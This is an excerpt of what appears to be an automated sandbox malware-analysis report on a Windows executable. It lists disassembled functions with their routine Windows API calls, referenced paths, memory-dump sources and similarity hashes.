                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                                          Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,774D3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                                          • GlobalFree.KERNEL32(007EC878), ref: 00403896
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-2145255484
                                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                                          Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405ADC
                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405AEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrlen
                                                                          • String ID: C:\Users\user\Desktop
                                                                          • API String ID: 2709904686-3080008178
                                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                                          Function 700E10E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 700E115B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E11B4
                                                                          • GlobalFree.KERNEL32(?), ref: 700E11C7
                                                                          • GlobalFree.KERNEL32(?), ref: 700E11F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc
                                                                          • String ID:
                                                                          • API String ID: 1780285237-0
                                                                          • Opcode ID: 1530a695360c14294d0f617ae40580318703368e287353fd56e165426f972cae
                                                                          • Instruction ID: 7b98d2ac5ec77eecf97539f8638b84c085c09649dcb371426547432eaddc0530
                                                                          • Opcode Fuzzy Hash: 1530a695360c14294d0f617ae40580318703368e287353fd56e165426f972cae
                                                                          • Instruction Fuzzy Hash: C6319AB2404200AFE711BF77DD89BAD7FF9EB05E70B2404E9EA46F2360D67498008B20
                                                                          Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                                          • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                          • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                                          • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                          • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8